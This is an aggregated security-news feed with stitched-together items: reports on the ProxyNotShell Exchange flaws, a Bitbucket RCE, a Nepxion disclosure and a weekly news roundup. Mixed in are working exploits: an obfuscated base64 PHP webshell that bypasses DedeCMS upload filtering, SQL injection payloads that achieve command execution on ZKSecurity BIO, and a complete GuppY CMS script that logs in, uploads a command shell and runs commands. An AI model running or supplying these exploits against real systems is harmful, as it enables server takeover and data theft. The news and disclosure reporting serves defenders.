Nicknamed ProxyNotShell, a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery (SSRF) vulnerability CVE-2022-41040 and a second vulnerability, CVE-2022-41082 that allows Remote Code Execution (RCE) when PowerShell is available to unidentified attackers.
Based on ProxyShell, this new zero-day abuse risk leverage a chained attack similar to

Nicknamed ProxyNotShell, a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery (SSRF) vulnerability CVE-2022-41040 and a second vulnerability, CVE-2022-41082 that allows Remote Code Execution (RCE) when PowerShell is available to unidentified attackers.

Based on ProxyShell, this new zero-day abuse risk leverage a chained attack similar to the one used in the 2021 ProxyShell attack that exploited the combination of multiple vulnerabilities - CVE-2021-34523, CVE-2021-34473, and CVE-2021-31207 – to permit a remote actor to execute arbitrary code.

Despite the potential severity of attacks using them, ProxyShell vulnerabilities are still on CISA's list of top 2021 routinely exploited vulnerabilities.

**Meet ProxyNotShell**

Recorded on September 19, 2022, CVE-2022-41082 is an attack vector targeting Microsoft's Exchange Servers, enabling attacks of low complexity with low privileges required. Impacted services, if vulnerable, enable an authenticated attacker to compromise the underlying exchange server by leveraging existing exchange PowerShell, which could result in a full compromise.

With the help of CVE-2022-41040, another Microsoft vulnerability also recorded on September 19, 2022, an attacker can remotely trigger CVE-2022-41082 to remotely execute commands.

Though a user needs to have the privilege to access CVE-2022-41040, which should curtail the vulnerability accessibility to attackers, the required level of privilege is low.

At the time of writing, Microsoft has not yet issued a patch but recommends that users add a blocking rule as a mitigation measure.

Both vulnerabilities were uncovered during an active attack against GTSC, a Vietnamese organization called GTSC, granting attackers access to some of their clients. Though neither vulnerability on its own is particularly dangerous, exploits chaining them together could potentially lead to catastrophic breaches.

The chained vulnerabilities could grant an outsider attacker the ability to read emails directly off an organization's server the ability to breach the organization with CVE-2022-41040 Remote Code Execution and implant malware on the organization's Exchange Server with CVE-2022-41082.

Though it appears that attackers would need some level of authentication to activate the chained vulnerabilities exploit, the exact level of authentication required – rated "Low" by Microsoft – is not yet clarified. Yet, this required low authentication level should effectively prevent a massive, automated attack targeting every Exchange server around the globe. This hopefully will prevent a replay of the 2021 ProxyShell debacle.

Yet, finding a single valid email address/password combination on a given Exchange server should not be overly difficult, and, as this attack bypasses MFA or FIDO token validation to log into Outlook Web Access, a single compromised email address/password combination is all that is needed.

**Mitigating ProxyNotShell Exposure**

At the time of writing, Microsoft has not yet issued a patch but recommends that users add a blocking rule as a mitigation measure of unknown efficacy.

Blocking incoming traffic to Exchange Servers holding critical asserts is also an option, though only practicable if such a measure does not impact vital operations and should ideally be perceived as a temporary measure pending Microsoft's issuance of a verified patch.

**Assessing ProxyNotShell Exposure**

As the current mitigation options are either of unverified efficacy or potentially damaging to the smooth running of operations, evaluating the degree of exposure to ProxyNotShell might prevent taking potentially disruptive unnecessary preventative measures, or indicate which assets to preemptively migrate to unexposed servers.

Cymulate Research Lab has developed a custom-made assessment for ProxyNotShell that enable organizations to estimate exactly their degree of exposure to ProxyNotShell.

A ProxyNotShell attack vector has been added to the advanced scenarios templates, and running it on your environment yields the necessary information to validate exposure – or lack thereof - to ProxyNotShell.

Until verified patches are available from Microsoft, assessing exposure to ProxyNotShell to evaluate exactly which servers are potential targets is the most cost-efficient way to evaluate exactly which assets are exposed and devise targeted preemptive measures with maximum impact.

By Cymulate Research Labs

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

ProxyNotShell – the New Proxy Hell?

‘ProxyNotShell’ abuse less severe than 2021 attack wave due to authentication requirement

‘ProxyNotShell’ abuse less severe than 2021 attack wave due to authentication requirement

Microsoft is developing a patch for two actively exploited zero-day vulnerabilities in Microsoft Exchange Server.

The flaws, tracked as CVE-2022-41040 and CVE-2022-41082, were discovered in Microsoft’s enterprise mail server by Vietnamese cybersecurity firm GTSC. Microsoft said it is aware of “a small number of targeted attacks” exploiting the flaws, which impact on-prem Microsoft Exchange Server versions 2013, 2016, and 2019.

The bugs appear to be less dangerous variants – on account of authentication to PowerShell being required – of the critical ProxyShell vulnerabilities that were widely abused in 2021.

**RCE chain**

In GTSC's original security advisory, researchers said they discovered an attack on “critical” infrastructure made through Exchange Server in August.

The first vulnerability, CVE-2022-41040 (CVSS 8.8), is a server-side request forgery (SSRF) issue. When triggered remotely to launch CVE-2022-41082 (CVSS 6.3), the bug could result in remote code execution (RCE).

Catch up of the latest enterprise security news

As the vulnerabilities are yet to be patched, the full technical details have not been released – but proof-of-concept (PoC) code is expected to appear soon.

GTSC informed Trend Micro’s Zero Day Initiative (ZDI) of its findings. After ZDI verified the flaws and reached out to the Microsoft Security Response Center (MSRC), the Redmond giant confirmed the report and published an analysis of attacks exploiting the flaws.

“Authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability, and they can be used separately,” Microsoft noted.

Unfortunately, the authentication required is nothing more than a standard user. As a result, cybercriminals could obtain these credentials via theft, credential stuffing, and brute-force attacks.

**State-sponsored attacks**

According to Microsoft, fewer than 10 organizations worldwide have been targeted by what is likely a “state-sponsored organization”.

GTSC researchers said there are indicators that a Chinese threat group is leveraging Antsword, a Chinese cross-platform website management suite with web shell functionality.

China Chopper, a web shell, has apparently been used to perform Active Directory reconnaissance and data exfiltration. If this sounds familiar, the same web shell was used in attacks exploiting Exchange Server zero-day vulnerabilities in 2021. These attacks were attributed to the state-sponsored Chinese threat group HAFNIUM.

BACKGROUND ‘A whole new attack surface’ – Researcher Orange Tsai documents ProxyLogon exploits against Microsoft Exchange Server

Security researcher Kevin Beaumont has noted similarities between the paths used by the new bugs, which he has dubbed ‘ProxyNotShell’, and the zero days from last year.

Devcore researcher Orange Tsai, who discovered the original, ProxyShell flaws, suggested in a talk at Black Hat USA (PDF) last year that fundamental path confusion issues could see further ProxyShell variants emerge – a prediction that has now come to pass.

**Mitigation advice**

Microsoft has released customer guidance for mitigating the new bugs while it works on a patch.

The company is urging customers to disable remote PowerShell access for non-administrators immediately. If the Exchange Emergency Mitigation Service (EEMS) is enabled, further mitigations will be applied automatically.

According to the tech giant, Exchange Online customers do not need to take any action. However, Beaumont has queried the wisdom of this statement, given that Microsoft Exchange Online migration involves using hybrid, internet-facing Exchange servers.

“It is expected that similar threats and overall exploitation of these vulnerabilities will increase, as security researchers and cybercriminals adopt the published research into their toolkits and proof of concept code becomes available,” Microsoft commented.

CISA has added the two zero-days to the Known Exploited Vulnerabilities Catalog.

Microsoft told The Daily Swig that the company has nothing further to share beyond the published advisories.

YOU MIGHT ALSO LIKE #AttachMe Oracle cloud bug exposed volumes to data theft, hijack

Microsoft confirms zero-day exploits against Exchange Server in ‘limited’ attacks

The Frontend File Manager Plugin WordPress plugin before 21.3 allows any authenticated users, such as subscriber, to rename a file to an arbitrary extension, like PHP, which could allow them to basically be able to upload arbitrary files on the server and achieve RCE

CVE-2022-3125

Categories: Exploits and vulnerabilities
Categories: News
Tags: Atlassian

Tags:  Bitbucket

Tags:  git

Tags:  CVE-2022-36804

Tags:  RCE

Tags:  read permission

International cybersecurity authorities are warning about the active exploitation of a vulnerability in Bitbucket Server and Data Center



(Read more...)




The post Actively exploited vulnerability in Bitbucket Server and Data Center appeared first on Malwarebytes Labs.

On September 29, 2022 the Cybersecurity & Infrastructure Security Agency (CISA) added three vulnerabilities to the catalog of known to be exploited vulnerabilities. One of them is a vulnerability in Atlassian’s Bitbucket Server and Data Center. The other two are the Exchange Server zero-day vulnerabilities we wrote about last week.

The Bitbucket vulnerability is no zero-day. Fixed versions were made available on August 24, 2022. The vulnerability allows an attacker who has read permissions to execute arbitrary code by sending a malicious HTTP request.

**Mitigation**

All versions of Bitbucket Server and Datacenter released after 6.10.17 including 7.0.0 and newer are affected. Atlassian recommends that you upgrade your instance to one of the versions listed below.

**Supported Version**

**Bug Fix Release**

Bitbucket Server and Data Center 7.6

7.6.17 (LTS) or newer

Bitbucket Server and Data Center 7.17

7.17.10 (LTS) or newer

Bitbucket Server and Data Center 7.21

7.21.4 (LTS) or newer

Bitbucket Server and Data Center 8.0

8.0.3 or newer

Bitbucket Server and Data Center 8.1

8.1.3 or newer

Bitbucket Server and Data Center 8.2

8.2.2 or newer

Bitbucket Server and Data Center 8.3

8.3.1 or newer

You can download the latest version of Bitbucket from the download center. Visit the Frequently Asked Questions (FAQ) page if you have any questions.

If, for any reason, you are unable to apply the security updates, you are advised to apply temporary partial mitigation by turning off public repositories by setting the option feature.public.access to false. This blocks unauthorized users from accessing the repository.

If you access Bitbucket via a bitbucket.org domain, it is hosted by Atlassian and you are not affected by the vulnerability.

**Vulnerability**

The Remote Code Execution vulnerability was found by Maxwell Garret a security researcher at  Assetnote and assigned CVE-2022-36804. The vulnerability was rated as critical, which indicates a CVSS score between 9 and 10 out of 10. If an attacker can read the content of a repository, either because it is a public repository or because they have read permission on a private repository, they are able to exploit the vulnerability.

**Discovery**

Bitbucket is a web based hosting service that distributes source code and development projects. Typically, Bitbucket Server is deployed on-premise and allows uploads of source code from GitHub and other platforms. Bitbucket uses git for many operations within the software. The discovery was inspired by the blog post from William Bowling about his RCE via git option injection in GitHub Enterprise.

**Exploitation**

The proof-of-concept (PoC) exploit was made public on September 19, 2022. Attackers did not wait long. Some were observed scanning for vulnerable instances as early as September 20th.

Besides CISA adding the vulnerability to the known to be exploited vulnerabilities list, the Belgian federal cyber emergency team (CERT.be) warned that an exploit kit is now available for CVE-2022-36804 and urged users to patch.

> WARNING: An exploit kit is now available for CVE-2022-36804 affecting @Atlassian @Bitbucket Server and Data Center. More information on https://t.co/ccK9ng8j58  
> If you haven't done so already, it's time to #patch #patch #patch https://t.co/fytm6ZEGiw
> 
> — CERT.be (@certbe) September 27, 2022

Now that CISA has set a to-be-patched date of October 21, 2022 this will put the vulnerability higher on the agenda for US Federal Civilian Executive Branch Agencies (FCEB) agencies. As always, all other organizations are under advice to patch urgently if they haven’t already.

Actively exploited vulnerability in Bitbucket Server and Data Center

Maintainer of Chinese project closes public issue apparently without issuing a fix

Charlie Osborne 03 October 2022 at 11:20 UTC

Maintainer of Chinese project closes public issue apparently without issuing a fix

An unpatched remote code execution (RCE) vulnerability in Nepxion Discovery, an open source project that provides functionality for the Spring Cloud framework, has been made public.

Security researchers from GitHub Security Lab (GHSL) disclosed the vulnerability, alongside an additional information disclosure flaw in Nepxion Discovery on September 9.

Nepxion, a China-based vendor, maintains several open source projects related to Spring Cloud.

Despite the Nepxion Discovery GitHub page having over 1,300 forks, the security policy page is disabled and the security advisories tab is empty.

**SpEL injection**

In a blog post, GHSL researcher Jorge Rosillo said the most severe vulnerability, tracked as GHSL-2022-033 (CVE-2022-23463), is a critical issue in the discovery-commons function that renders the software vulnerable to SpEL Injection.

SpEL Injection attacks occur when there is a lack of protection to stop user input from passing directly to a SpEL expression parser. In this case, two endpoints turn user input into expressions, pass them through, and input is then allowed to interact with Java classes – including java.lang.Runtime – leading to RCE.

Read more of the latest open source software security news

Due to the severity, this vulnerability was assigned a CVSS score of 9.8.

The second issue, tracked as GHSL-2022-033 (CVE-2022-23464) and issued a can GitHub score of 4.3 (NIST 7.5), is a server-side request forgery (SSRF) flaw that could result in information leaks.

According to the GHSL, no patch has been made available, and there are no known workarounds for either vulnerability. The issues impact Nepxion Discovery versions 6.16.2 and below.

The cybersecurity researchers privately disclosed their findings to Nepxion on May 22. In June, the team requested a security contact and, with no response forthcoming, a public issue was opened on June 20.

The maintainers closed the public issue on August 9.

By August 21, the standard vulnerability disclosure process deadline had expired, leading to the assignment of CVE-2022-23463 and CVE-2022-23464 and public disclosure.

When approached for comment, GitHub pointed us to the original disclosure.

Nepxion has yet to respond to queries submitted by The Daily Swig, but we will update this article if and when we hear back.

YOU MIGHT ALSO LIKE Rancher stored sensitive values in plaintext, exposed Kubernetes clusters to takeover

Nepxion Discovery software with Spring Cloud functionality fails to patch RCE, info leak bugs

DedeCMS 5.7.98 has a file upload vulnerability in the background.

**DedeCMS v5.7.98 RCE**

Dedecms official website：https://www.dedecms.com/download

**Vulnerability Description**

The dedecms v5.7.98 has a file upload function in the background, which can write malicious code to bypass detection and cause RCE vulnerabilities.

Affected product: DedeCMS V5.7.98 Attack type: Remote Affected component: /dede/file\_manage\_control.php

**Recurrence Process**

Visit /dede to login to the website background.

Upload the file below.

 shell.php

<?php
$a = "Y3JlYXRlX2Z1bmN0aW9u";
$b = base64\_decode($a);
$c = $\_COOKIE\['hello'\] . ';';
$b('', $c)();

Upload success.

Visit shell.php to get the webshell.

**Code Audit**

In /dede/file_manage_control.php, the file we upload will be checked by uploadsafe.inc.php

    if (file\_exists($$\_key)) {
        $fp = fopen($$\_key, 'rb');
        $content = fread($fp, ${$\_key . '\_size'});
        fclose($fp);

        global $cfg\_disable\_funs;
        $cfg\_disable\_funs = isset($cfg\_disable\_funs) ? $cfg\_disable\_funs : 'phpinfo,eval,assert,exec,passthru,shell\_exec,system,proc\_open,popen,curl\_exec,curl\_multi\_exec,parse\_ini\_file,show\_source,file\_put\_contents,fsockopen,fopen,fwrite,preg\_replace';
        $cfg\_disable\_funs = $cfg\_disable\_funs.',\_GET,\_POST,\_REQUEST,include,create\_function,array\_map,call\_user\_func,call\_user\_func\_array,array\_filert';
        foreach (explode(",", $cfg\_disable\_funs) as $value) {
            $value = str\_replace(" ", "", $value);
            if(!empty($value) && preg\_match("#\[^a-z\]+\['\\"\]\*{$value}\['\\"\]\*\[\\s\]\*\[(\[\]#i", " {$content}") == TRUE) {
                $content = dede\_htmlspecialchars($content);
                die("DedeCMS提示：当前上传的文件中存在恶意代码！<pre>{$content}</pre>");
            }
            if(!empty($value) && preg\_match("#(<)\[\\s\]\*(script)\[\\s\\S\]\*(src)\[\\s\]\*(=)\[\\s\]\*\[\\"|'\]#i", " {$content}") == TRUE) {
                preg\_match\_all("#(src)\[\\s\]\*(=)\[\\s\]\*\[\\"|'\]\[\\s\]\*((http|https)(:\\/\\/)\[\\S\]\*)\[\\"|'\]#i", " {$content}", $subject);
                foreach ($subject\[3\] as $url) {
                    if (preg\_match("#^(http|https):\\/\\/#i", $url) && !preg\_match("#^{$cfg\_basehost}#", $url)) {
                        die("DedeCMS提示：非本站资源无法访问！<pre>{$url}</pre>");
                    }
                }
            }
        }
    }

$cfg_disable_funsdefines a blacklist. When characters in the file content match the blacklist, they will be blocked. But this can be bypassed by coding in some way.

create\_function is a PHP function, which create an anonymous (lambda-style) function. This callback function is in the blacklist, but we can assign it to a variable using base64 coding, and execute the function through the variable name.

_GET,_POST,_REQUEST are in the blacklist, so we can use _COOKIE to bypass.

By splicing the two together, we get the final payload.

In addition, the function blacklist of the blacklist can be modified in the background. We can also get shell in this way.

CVE-2022-40886: Vulnerability/DedeCMS-v5.7.98-RCE.md at master · Ephemeral1y/Vulnerability

Microsoft Exchange Server Remote Code Execution Vulnerability.

CVE-2022-41082

ZKSecurity BIO version 4.1.2 suffers from a remote SQL injection vulnerability that can allow for remote code execution.

    #######################ADVISORY INFORMATION#######################Product: ZKSecurity BIOVendor: ZKTeco (https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2)Version Affected: 4.1.2CVE: CVE-2022-36635Vulnerability: SQL Injection (with a plus: RCE)#######################CREDIT#######################This vulnerability was discovered and researched by Caio Burgardt andSilton Santos.#######################INTRODUCTION#######################Based on the hybrid biometric technology and computer vision technology,ZKBioSecurity provides a comprehensive web-based security platform. Itcontains multiple integrated modules: personnel, time & attendance, accesscontrol, visitor management, offline & online consumption management, guardpatrol, parking, elevator control, entrance control, Facekiosk, intelligentvideo management, mask and temperature detection module, and other smartsub-systems.#######################VULNERABILITY DETAILS#######################The parameters opTimeBegin e opTimeEnd are simply concatenated to the SQLquery, with only a sanitization filter in front of it. Using comments(/**/) in place of spaces was enough to confuse and bypass the filter.#######################PROOF OF CONCEPT#######################Note that the request delayed 10s:POST /baseOpLog.do HTTP/1.1Host: {HOST}Content-Type: application/x-www-form-urlencodedCookie: SESSION={COOKIE}; menuType=icon-onlyContent-Length: 208list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/select+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50if you use the next query, you can execute remote command:list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_count;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text);COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'='#######################END#######################

ZKSecurity BIO 4.1.2 SQL Injection / Code Execution

GuppY CMS version 6.00.10 suffers from an authenticated remote shell upload vulnerability.

    # Exploit Title: GuppY 6.00.10 CMS Remote Code Execution# Date: Sep 30, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.freeguppy.org/# Software Link:https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2# Version: 6.00.10# Tested on: Linux#!/usr/bin/php<?php$username = "Admin"; //Administrator username$password = "rose1337"; //Administrator password$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\n");$target     =  $options['u'];$command    =  $options['c'];// Administrator login$cookie="cookie.txt";$url = "{$target}guppy/connect.php";$postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;$curlObj = curl_init();curl_setopt($curlObj, CURLOPT_URL, $url);curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curlObj, CURLOPT_HEADER, 1);curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata);curl_setopt ($curlObj, CURLOPT_POST, 1);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");$result = curl_exec($curlObj);// uploading shell$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";$post='------WebKitFormBoundarygA1APFcUlkIaWal4Content-Disposition: form-data; name="rep"file------WebKitFormBoundarygA1APFcUlkIaWal4Content-Disposition: form-data; name="ficup"; filename="shell.php"Content-Type: application/x-php<?php system($_GET["cmd"]); ?>------WebKitFormBoundarygA1APFcUlkIaWal4--';$headers = array(            'Content-Type: multipart/form-data;boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',            'Accept-Encoding: gzip, deflate',            'Accept-Language: en-US,en;q=0.9');curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);curl_setopt($curlObj, CURLOPT_URL, $url2);curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);curl_setopt($curlObj, CURLOPT_POST, true);curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");$data = curl_exec($curlObj);// Executing the shell$shell = "{$target}guppy/file/shell.php?cmd=" .$command;curl_setopt($curlObj, CURLOPT_URL, $shell);curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type:application/x-www-form-urlencoded'));curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);curl_setopt($curlObj, CURLOPT_HEADER, False);curl_setopt($curlObj, CURLOPT_POST, false);$exec_shell = curl_exec($curlObj);$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);if($code != 200) {    echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check thecredentials\n";}else {print("\n");print($exec_shell);}curl_close($curlObj);?>

GuppY CMS 6.00.10 Shell Upload

Plus: CIA failures allegedly got US informants killed, a former NSA worker is charged under the Espionage Act, and more.

There were global ripples in tech policy this week as VPN providers were forced to pull out of India as the country’s new data collection law takes hold, and UN countries prepare to elect a new head of the International Telecommunications Union—a key internet standards body.

After explosions and damage to the Nord Stream gas pipeline that runs between Russia and Germany, the destruction is being investigated as deliberate, and a complicated hunt is on to identify the perpetrator. And still-unidentified hackers are “hyperjacking” victims to grab data using a long-feared technique for hijacking virtualization software.

The notorious Lapsus$ hackers have been back on their hacking joyride, compromising massive companies around the world and delivering a dire but important warning about how vulnerable large institutions really are to compromise. And the end-to-end-encrypted communication protocol Matrix patched serious and concerning vulnerabilities this week.

Pornhub debuted a trial of an automated tool that pushes users searching for child sexual abuse material to seek help for their behavior. And Cloudflare rolled out a free Captcha alternative in an attempt to validate humanness online without the headache of finding bicycles in a grid or deciphering blurry text.

We’ve got advice on how to stand up to Big Tech and advocate for data privacy and users' rights in your community, plus tips on the latest iOS, Chrome, and HP updates you need to install.

And there’s more. Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

On Thursday night, Microsoft confirmed that two unpatched Exchange Server vulnerabilities are actively being exploited by cybercriminals. The vulnerabilities were discovered by a Vietnamese cybersecurity company named GTSC, which claims in a post on its website that the two zero-days have been used in attacks against its customers since early August. While the flaws only impact on-premise Exchange Servers that an attacker has authenticated access to, according to GTSC, the zero-days can be chained together to create backdoors into the vulnerable server. “The vulnerability turns out to be so critical that it allows the attacker to do RCE \[remote code execution\] on the compromised system,” the researchers said.

In a blog post, Microsoft described the first flaw as a server-side request forgery (SSRF) vulnerability, and the second as “an attack that allows remote code execution on a vulnerable server when PowerShell is accessible to the attacker.” The post also provides guidance for how on-premises Microsoft Exchange customers should mitigate the attack.

Sloppy dev-ops and CIA negligence partially enabled Iranian intelligence to identify and capture informants who risked their lives to provide the United States with information, according Reuters. The year-long investigation follows the story of six Iranian men who were jailed as part of an aggressive counterintelligence operation by Iran that began in 2009. The men were partially outed by what Reuters describes as a flawed web-based covert communications system that led to the arrest and execution of dozens of CIA informants in Iran and China. In 2018, Yahoo News reported on the system.

Because the CIA appeared to have purchased web-hosting space in bulk from the same provider, Reuters was able to enumerate hundreds of secret CIA websites meant to facilitate communications between informants around the world and their CIA handlers. The sites, which are no longer active, were devoted to topics such as beauty, fitness, and entertainment. Among them, according to Reuters, was a _Star Wars_ fan page. Two former CIA officials told the news agency that each fake website was assigned to only one spy in order to limit exposure of the entire network in case any single agent was captured.

James Olson, a former chief of CIA counterintelligence, told Reuters, “If we’re careless, if we’re reckless, and we’ve been penetrated, then shame on us.”

On Wednesday, a former National Security Agency staffer was charged with three violations of the Espionage Act for allegedly attempting to sell classified national defense information to an unnamed foreign government, according to court documents unsealed this week. In a press release about the arrest, the US Department of Justice stated that Jareh Sebastian Dalke, of Colorado Springs, Colorado, used an encrypted email to send excerpts of three classified documents to an undercover FBI agent, who he believed to be working with a foreign government. Dalke allegedly told the agent that he was in serious financial debt and, in exchange for the information, needed compensation in cryptocurrency.

The FBI arrested Dalke on Wednesday when he arrived at Union Station in downtown Denver to deliver classified documents to the undercover agent. If convicted, he could face up to life in prison or the death penalty.

On Tuesday, hackers hijacked _Fast Company_’s content management system, blasting two obscene push notifications to the publication’s Apple News followers. In response, the publication’s parent company, Mansueto Ventures, shut down Fastcompany.com and Inc.com, which it also owns. _Fast Company_ issued a statement calling the messages “vile” and “not in line with the content and ethos” of the outlet. An article the hacker apparently posted to _Fast Company_’s website claimed they got access through a password that was shared across many accounts, including an administrator.

As of yesterday, the company’s websites were still offline, instead redirecting to a statement about the hack.

Tag

#rce